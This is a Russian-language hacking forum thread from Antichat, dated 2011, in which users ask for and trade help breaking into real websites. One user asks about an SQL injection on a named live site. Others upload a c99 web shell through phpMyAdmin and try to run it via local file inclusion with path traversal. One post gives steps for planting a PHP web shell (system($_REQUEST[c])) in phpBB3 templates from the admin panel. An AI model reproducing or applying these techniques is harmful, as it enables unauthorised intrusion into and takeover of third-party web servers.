ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2011, 00:43
asql
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами: 8014646

Репутация: -3
По умолчанию

Как можно это обработать на "чистый" лист?

http://www.elitecrownmoldings.com/home.php?cat=6

кстати, тут походу у пользователя есть права на INSERT =)

и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
 
Ответить с цитированием

  #2  
Старый 14.03.2011, 03:19
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

залили шелл через pma

узнал путь /var/lib/mysql/tmp/c99.php

но теперь как шелл то сам юзануть?
 
Ответить с цитированием

  #3  
Старый 14.03.2011, 03:20
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от foozzi  
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?
инклюд локальный, больше никак ...
 
Ответить с цитированием

  #4  
Старый 14.03.2011, 03:24
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от asql  
Как можно это обработать на "чистый" лист?
http://www.elitecrownmoldings.com/home.php?cat=6
кстати, тут походу у пользователя есть права на INSERT =)
и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
Дело не в правах пользователя на INSERT, а в том что в уязвимый запрос входит команда INSERT.

Могу сказать, что INSERT-иньекцию провести не удасться, т.к. в запрос входит путь, который подделать\обрезать не возможно.

Код:
/product.php?prod'uctid=256 => INSERT INTO xcart_stats_pages(page) VALUES('/product.php?prod'uctid=256')
/pro'duct.php?productid=256 => Not Found
Мдя уж, забавно

По поводу привилегий:

Максимальный привелегии, что у тебя могут быть (которые помогаю в SQLi) это доступ на чтение mysql.user, чтобы узнать пасс админа MySQL и подключиться удаленно\к phpMyAdmin, если есть, ну или пробрутить FTP\SSH.

Ну или file_priv, что тебе позволяет читать файлы, а при отсутсвие mq, то и заливать файлы

Ну и обычно если есть доступ к mysql.user, то и есть доступ в file_priv.

Ну и по поводу раскручивания данной инъекции.

Запрос выдает ошибку только при кавычке подставленной, если ее нет, то все отбрасываеться.

Попробуй избавиться от ошибки при кавычке.

Цитата:
Сообщение от foozzi  
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?
Ты залил шелл в /tmp, в котором храняться файлы сессий, к которому нету доступа из под веба, то есть никак не прочитать (ну если нету LFI\RFI). Попробуй просканить сайт на директории, посмотри в каких папках лежат картинки\js\css \etc и пробуй залить во все эти диры, ведь я, надеюсь, у тебя есть путь к сайту? Если нету то читай мой пост пару страниц ниже...
 
Ответить с цитированием

  #5  
Старый 14.03.2011, 03:26
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

Цитата:
Сообщение от Lijzer  
инклюд локальный, больше никак ...
нашол путь тот который надо

http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php

но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто

пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
 
Ответить с цитированием

  #6  
Старый 14.03.2011, 03:58
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от foozzi  
нашол путь тот который надо
http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php
но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто
пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
DirBuster тебе в помощь...
 
Ответить с цитированием

  #7  
Старый 14.03.2011, 14:02
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку

Гугл не помог
 
Ответить с цитированием

  #8  
Старый 14.03.2011, 14:18
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от noviyuser  
как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку
Гугл не помог
google.ru > Заливка шелла phpbb3 site:forum.antichat.ru

google.ru > Заливка шелла phpbb3 site:rdot.org

гуглим правильно (с)
 
Ответить с цитированием

  #9  
Старый 14.03.2011, 14:19
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Заливка шела через темплейты в phpBB3 (необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).

2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

system($_REQUEST[c]);

Источник
 
Ответить с цитированием

  #10  
Старый 14.03.2011, 15:01
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от stan_q  
Заливка шела через темплейты в phpBB3 (необходим доступ в админку).
1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

system($_REQUEST[c]);

Источник
Цитата:
Сообщение от None  
SQL ERROR [ mysqli ]
Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]
INSERT INTO phpbb3_styles_template_data (template_id, template_filename, template_included, template_mtime, template_data) VALUES (1, 'overall_footer.html', 'confirm_body.html:faq_body.html:index_body.html:l ogin_forum.html:mcp_approve.html:mcp_footer.html:m cp_move.html:memberlist_body.html:memberlist_email .html:memberlist_leaders.html:memberlist_view.html :message_body.html
osting_layout.html
rime_delete_confirm.html:report_body.html:reputati on_body.html:search_body.html:search_results.html: thankslist_body.html:thanks_results.html:toplist_b ody.html:ucp_agreement.html:ucp_footer.html:ucp_re mind.html:ucp_resend.html:viewforum_body.html:view online_body.html:viewtopic_body.html:gallery_foote r.html
ortal_body.html:stats_footer.html:', 1294949740, '
блабла
BACKTRACE
FILE: includes/db/mysqli.php
LINE: 163
CALL: dbal->sql_error()
FILE: includes/acp/acp_styles.php
LINE: 2624
CALL: dbal_mysqli->sql_query()
FILE: includes/acp/acp_styles.php
LINE: 3661
CALL: acp_styles->store_templates()
FILE: includes/acp/acp_styles.php
LINE: 3628
CALL: acp_styles->_store_in_db()
FILE: includes/acp/acp_styles.php
LINE: 774
CALL: acp_styles->store_in_db()
FILE: includes/acp/acp_styles.php
LINE: 180
CALL: acp_styles->edit_template()
FILE: includes/functions_module.php
LINE: 507
CALL: acp_styles->main()
FILE: adm/index.php
LINE: 78
CALL: p_master->load_active()
что неправильно сделано?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.